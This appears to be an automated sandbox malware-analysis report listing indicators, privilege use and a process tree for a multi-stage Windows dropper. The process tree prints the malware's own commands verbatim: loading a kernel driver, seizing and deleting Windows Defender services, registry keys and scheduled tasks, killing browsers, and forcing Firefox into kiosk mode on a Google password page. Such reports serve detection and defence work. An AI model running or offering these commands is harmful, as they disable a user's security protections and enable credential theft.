\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3880 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 47 IoCs
pid Process 5952 taskkill.exe 6484 taskkill.exe 2408 taskkill.exe 7576 taskkill.exe 7188 taskkill.exe 7536 taskkill.exe 6884 taskkill.exe 6224 taskkill.exe 7016 taskkill.exe 7192 taskkill.exe 8420 taskkill.exe 3492 taskkill.exe 4944 taskkill.exe 316 taskkill.exe 4924 taskkill.exe 6528 taskkill.exe 6764 taskkill.exe 6876 taskkill.exe 7256 taskkill.exe 7608 taskkill.exe 1576 taskkill.exe 6240 taskkill.exe 6532 taskkill.exe 6820 taskkill.exe 7364 taskkill.exe 7776 taskkill.exe 4376 taskkill.exe 924 taskkill.exe 2648 taskkill.exe 6828 taskkill.exe 7468 taskkill.exe 7476 taskkill.exe 4444 taskkill.exe 6552 taskkill.exe 8652 taskkill.exe 2068 taskkill.exe 4436 taskkill.exe 4444 taskkill.exe 6136 taskkill.exe 4824 taskkill.exe 6536 taskkill.exe 740 taskkill.exe 1564 taskkill.exe 3620 taskkill.exe 7172 taskkill.exe 4856 taskkill.exe 1492 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880590172448803" chrome.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{A4F0B679-BD4D-4515-B9D3-00A871683422} chrome.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{CF1E7184-6267-4124-8FD2-CEB9147AC438} msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3539616762.txt\ cmd.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5680 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2352 1Q30C9.exe 2352 1Q30C9.exe 5056 rapes.exe 5056 rapes.exe 2036 2y1617.exe 2036 2y1617.exe 2036 2y1617.exe 2036 2y1617.exe 2036 2y1617.exe 2036 2y1617.exe 2924 rapes.exe 2924 rapes.exe 1164 23da5e6bb9.exe 1164 23da5e6bb9.exe 1164 23da5e6bb9.exe 1164 23da5e6bb9.exe 1164 23da5e6bb9.exe 1164 23da5e6bb9.exe 4464 ad3a6208a1.exe 4464 ad3a6208a1.exe 1700 29043e627c.exe 1700 29043e627c.exe 1056 d0249e62d5.exe 1056 d0249e62d5.exe 1056 d0249e62d5.exe 1056 d0249e62d5.exe 1056 d0249e62d5.exe 1056 d0249e62d5.exe 5852 2039335369.exe 5852 2039335369.exe 1724 4760908696.exe 1724 4760908696.exe 2332 9220b9dffd.exe 2332 9220b9dffd.exe 1724 4760908696.exe 1724 4760908696.exe 2332 9220b9dffd.exe 2332 9220b9dffd.exe 2332 9220b9dffd.exe 5368 MSBuild.exe 5368 MSBuild.exe 5368 MSBuild.exe 5368 MSBuild.exe 5008 rapes.exe 5008 rapes.exe 5200 3514bb24fc.exe 5200 3514bb24fc.exe 5200 3514bb24fc.exe 5200 3514bb24fc.exe 6576 91c4598add.exe 6576 91c4598add.exe 6820 MSBuild.exe 6820 MSBuild.exe 6820 MSBuild.exe 6820 MSBuild.exe 5560 MSBuild.exe 5560 MSBuild.exe 5560 MSBuild.exe 5560 MSBuild.exe 4836 Passwords.com 4836 Passwords.com 4836 Passwords.com 4836 Passwords.com 4836 Passwords.com -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 656 Process not Found 656 Process not Found 2516 tzutil.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4576 p3hx1_003.exe 4576 p3hx1_003.exe 4576 p3hx1_003.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 924 taskkill.exe Token: SeDebugPrivilege 2068 taskkill.exe Token: SeDebugPrivilege 4436 taskkill.exe Token: SeDebugPrivilege 4444 taskkill.exe Token: SeDebugPrivilege 3492 taskkill.exe Token: SeDebugPrivilege 4412 firefox.exe Token: SeDebugPrivilege 4412 firefox.exe Token: SeDebugPrivilege 2332 9220b9dffd.exe Token: SeDebugPrivilege 7900 tasklist.exe Token: SeDebugPrivilege 6028 tasklist.exe Token: SeDebugPrivilege 3480 tasklist.exe Token: SeDebugPrivilege 4404 tasklist.exe Token: SeDebugPrivilege 6188 tasklist.exe Token: SeDebugPrivilege 5840 tasklist.exe Token: SeDebugPrivilege 2412 tasklist.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 6452 tasklist.exe Token: SeDebugPrivilege 6760 tasklist.exe Token: SeDebugPrivilege 6872 powershell.exe Token: SeIncreaseQuotaPrivilege 6872 powershell.exe Token: SeSecurityPrivilege 6872 powershell.exe Token: SeTakeOwnershipPrivilege 6872 powershell.exe Token: SeLoadDriverPrivilege 6872 powershell.exe Token: SeSystemProfilePrivilege 6872 powershell.exe Token: SeSystemtimePrivilege 6872 powershell.exe Token: SeProfSingleProcessPrivilege 6872 powershell.exe Token: SeIncBasePriorityPrivilege 6872 powershell.exe Token: SeCreatePagefilePrivilege 6872 powershell.exe Token: SeBackupPrivilege 6872 powershell.exe Token: SeRestorePrivilege 6872 powershell.exe Token: SeShutdownPrivilege 6872 powershell.exe Token: SeDebugPrivilege 6872 powershell.exe Token: SeSystemEnvironmentPrivilege 6872 powershell.exe Token: SeRemoteShutdownPrivilege 6872 powershell.exe Token: SeUndockPrivilege 6872 powershell.exe Token: SeManageVolumePrivilege 6872 powershell.exe Token: 33 6872 powershell.exe Token: 34 6872 powershell.exe Token: 35 6872 powershell.exe Token: 36 6872 powershell.exe Token: SeDebugPrivilege 6992 tasklist.exe Token: SeDebugPrivilege 7144 powershell.exe Token: SeDebugPrivilege 7192 tasklist.exe Token: SeDebugPrivilege 7524 tasklist.exe Token: SeDebugPrivilege 7576 tasklist.exe Token: SeDebugPrivilege 7608 taskkill.exe Token: SeDebugPrivilege 4944 taskkill.exe Token: SeDebugPrivilege 6136 taskkill.exe Token: SeDebugPrivilege 5952 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 6892 tasklist.exe Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 3604 tasklist.exe Token: SeDebugPrivilege 3620 taskkill.exe Token: SeDebugPrivilege 1576 taskkill.exe Token: SeDebugPrivilege 4800 tasklist.exe Token: SeDebugPrivilege 4924 taskkill.exe Token: SeDebugPrivilege 6224 taskkill.exe Token: SeDebugPrivilege 6220 tasklist.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 6240 taskkill.exe Token: SeDebugPrivilege 3812 tasklist.exe Token: SeDebugPrivilege 6484 taskkill.exe Token: SeDebugPrivilege 6536 taskkill.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 1724 4760908696.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 1724 4760908696.exe 4412 firefox.exe 1724 4760908696.exe 1724 4760908696.exe 4836 Passwords.com 4836 Passwords.com 4836 Passwords.com 2820 chrome.exe 7212 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 1724 4760908696.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 4412 firefox.exe 1724 4760908696.exe 1724 4760908696.exe 1724 4760908696.exe 4836 Passwords.com 4836 Passwords.com 4836 Passwords.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4412 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5668 wrote to memory of 1748 5668 file.exe 89 PID 5668 wrote to memory of 1748 5668 file.exe 89 PID 5668 wrote to memory of 1748 5668 file.exe 89 PID 2112 wrote to memory of 5876 2112 cmd.exe 91 PID 2112 wrote to memory of 5876 2112 cmd.exe 91 PID 1748 wrote to memory of 2352 1748 G4l05.exe 92 PID 1748 wrote to memory of 2352 1748 G4l05.exe 92 PID 1748 wrote to memory of 2352 1748 G4l05.exe 92 PID 1508 wrote to memory of 5700 1508 cmd.exe 94 PID 1508 wrote to memory of 5700 1508 cmd.exe 94 PID 2352 wrote to memory of 5056 2352 1Q30C9.exe 98 PID 2352 wrote to memory of 5056 2352 1Q30C9.exe 98 PID 2352 wrote to memory of 5056 2352 1Q30C9.exe 98 PID 1748 wrote to memory of 2036 1748 G4l05.exe 99 PID 1748 wrote to memory of 2036 1748 G4l05.exe 99 PID 1748 wrote to memory of 2036 1748 G4l05.exe 99 PID 5056 wrote to memory of 5472 5056 rapes.exe 106 PID 5056 wrote to memory of 5472 5056 rapes.exe 106 PID 5056 wrote to memory of 5472 5056 rapes.exe 106 PID 5472 wrote to memory of 1808 5472 apple.exe 107 PID 5472 wrote to memory of 1808 5472 apple.exe 107 PID 5472 wrote to memory of 1808 5472 apple.exe 107 PID 1808 wrote to memory of 2216 1808 261.exe 109 PID 1808 wrote to memory of 2216 1808 261.exe 109 PID 2216 wrote to memory of 1912 2216 cmd.exe 111 PID 2216 wrote to memory of 1912 2216 cmd.exe 111 PID 2216 wrote to memory of 1912 2216 cmd.exe 111 PID 1912 wrote to memory of 4844 1912 261.exe 112 PID 1912 wrote to memory of 4844 1912 261.exe 112 PID 4844 wrote to memory of 3904 4844 cmd.exe 114 PID 4844 wrote to memory of 3904 4844 cmd.exe 114 PID 4844 wrote to memory of 3896 4844 cmd.exe 115 PID 4844 wrote to memory of 3896 4844 cmd.exe 115 PID 4844 wrote to memory of 3880 4844 cmd.exe 116 PID 4844 wrote to memory of 3880 4844 cmd.exe 116 PID 4844 wrote to memory of 5804 4844 cmd.exe 117 PID 4844 wrote to memory of 5804 4844 cmd.exe 117 PID 4844 wrote to memory of 1452 4844 cmd.exe 118 PID 4844 wrote to memory of 1452 4844 cmd.exe 118 PID 4844 wrote to memory of 3132 4844 cmd.exe 119 PID 4844 wrote to memory of 3132 4844 cmd.exe 119 PID 4844 wrote to memory of 5724 4844 cmd.exe 120 PID 4844 wrote to memory of 5724 4844 cmd.exe 120 PID 4844 wrote to memory of 1172 4844 cmd.exe 121 PID 4844 wrote to memory of 1172 4844 cmd.exe 121 PID 4844 wrote to memory of 664 4844 cmd.exe 122 PID 4844 wrote to memory of 664 4844 cmd.exe 122 PID 4844 wrote to memory of 4824 4844 cmd.exe 123 PID 4844 wrote to memory of 4824 4844 cmd.exe 123 PID 4844 wrote to memory of 6072 4844 cmd.exe 124 PID 4844 wrote to memory of 6072 4844 cmd.exe 124 PID 4844 wrote to memory of 396 4844 cmd.exe 125 PID 4844 wrote to memory of 396 4844 cmd.exe 125 PID 4844 wrote to memory of 3356 4844 cmd.exe 126 PID 4844 wrote to memory of 3356 4844 cmd.exe 126 PID 4844 wrote to memory of 5960 4844 cmd.exe 127 PID 4844 wrote to memory of 5960 4844 cmd.exe 127 PID 4844 wrote to memory of 5088 4844 cmd.exe 128 PID 4844 wrote to memory of 5088 4844 cmd.exe 128 PID 4844 wrote to memory of 1932 4844 cmd.exe 129 PID 4844 wrote to memory of 1932 4844 cmd.exe 129 PID 4844 wrote to memory of 5192 4844 cmd.exe 131 PID 4844 wrote to memory of 5192 4844 cmd.exe 131 PID 4844 wrote to memory of 2780 4844 cmd.exe 132 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2640
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5668 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G4l05.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G4l05.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q30C9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q30C9.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\735B.tmp\735C.tmp\735D.bat C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7465.tmp\7466.tmp\7467.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"9⤵
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"10⤵
- Launches sc.exe
PID:3904
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
PID:3896
-
-
C:\Windows\system32\timeout.exetimeout /t 110⤵
- Delays execution with timeout.exe
PID:3880
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
PID:5804
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
PID:1452
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3132
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5724
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"10⤵
- Launches sc.exe
PID:1172
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"10⤵
- Launches sc.exe
PID:664
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f10⤵PID:4824
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"10⤵
- Launches sc.exe
PID:6072
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"10⤵
- Launches sc.exe
PID:396
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f10⤵PID:3356
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"10⤵
- Launches sc.exe
PID:5960
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"10⤵
- Launches sc.exe
PID:5088
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f10⤵PID:1932
-
-
C:\Windows\system32\sc.exesc stop "Sense"10⤵
- Launches sc.exe
PID:5192
-
-
C:\Windows\system32\sc.exesc delete "Sense"10⤵
- Launches sc.exe
PID:2780
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f10⤵PID:1228
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"10⤵
- Launches sc.exe
PID:5464
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"10⤵
- Launches sc.exe
PID:3628
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f10⤵
- Modifies security service
PID:2132
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"10⤵
- Launches sc.exe
PID:3496
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"10⤵
- Launches sc.exe
PID:1576
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f10⤵PID:4800
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"10⤵
- Launches sc.exe
PID:4828
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"10⤵
- Launches sc.exe
PID:2676
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f10⤵PID:4908
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"10⤵
- Launches sc.exe
PID:2416
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"10⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f10⤵PID:4916
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"10⤵
- Launches sc.exe
PID:2540
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"10⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f10⤵PID:5740
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"10⤵
- Launches sc.exe
PID:5228
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"10⤵
- Launches sc.exe
PID:6112
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f10⤵PID:5760
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"10⤵
- Launches sc.exe
PID:1236
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"10⤵
- Launches sc.exe
PID:5484
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f10⤵PID:5200
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"10⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"10⤵
- Launches sc.exe
PID:2584
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f10⤵PID:4280
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"10⤵
- Launches sc.exe
PID:4288
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"10⤵
- Launches sc.exe
PID:4284
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f10⤵PID:1900
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"10⤵
- Launches sc.exe
PID:4208
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"10⤵
- Launches sc.exe
PID:5532
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f10⤵PID:3760
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"10⤵
- Launches sc.exe
PID:6084
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"10⤵
- Launches sc.exe
PID:1768
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f10⤵PID:544
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"10⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"10⤵
- Launches sc.exe
PID:3304
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f10⤵PID:1056
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f10⤵PID:5176
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f10⤵PID:1976
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f10⤵PID:3976
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f10⤵PID:5692
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
PID:3068
-
-
C:\Windows\system32\sc.exesc delete ddrver10⤵
- Launches sc.exe
PID:2332
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416940101\23da5e6bb9.exe"C:\Users\Admin\AppData\Local\Temp\10416940101\23da5e6bb9.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"5⤵
- Executes dropped EXE
PID:4124
-
-
C:\Users\Admin\AppData\Local\Temp\10416970101\ad3a6208a1.exe"C:\Users\Admin\AppData\Local\Temp\10416970101\ad3a6208a1.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10416970101\ad3a6208a1.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5028
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416980101\29043e627c.exe"C:\Users\Admin\AppData\Local\Temp\10416980101\29043e627c.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10416980101\29043e627c.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1632
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416990101\d0249e62d5.exe"C:\Users\Admin\AppData\Local\Temp\10416990101\d0249e62d5.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1056
-
-
C:\Users\Admin\AppData\Local\Temp\10417000101\2039335369.exe"C:\Users\Admin\AppData\Local\Temp\10417000101\2039335369.exe"5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5852
-
-
C:\Users\Admin\AppData\Local\Temp\10417010101\4760908696.exe"C:\Users\Admin\AppData\Local\Temp\10417010101\4760908696.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1724 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:1444
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4412 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2032 -prefsLen 27099 -prefMapHandle 2036 -prefMapSize 270279 -ipcHandle 2112 -initialChannelId {328ea2b1-5a4b-4b0c-aa98-5697729172e8} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu8⤵PID:4556
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2520 -prefsLen 27135 -prefMapHandle 2524 -prefMapSize 270279 -ipcHandle 2532 -initialChannelId {5ca99fd6-c12d-4f9c-8756-5afcfc662c58} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket8⤵
- Checks processor information in registry
PID:1348
-
-
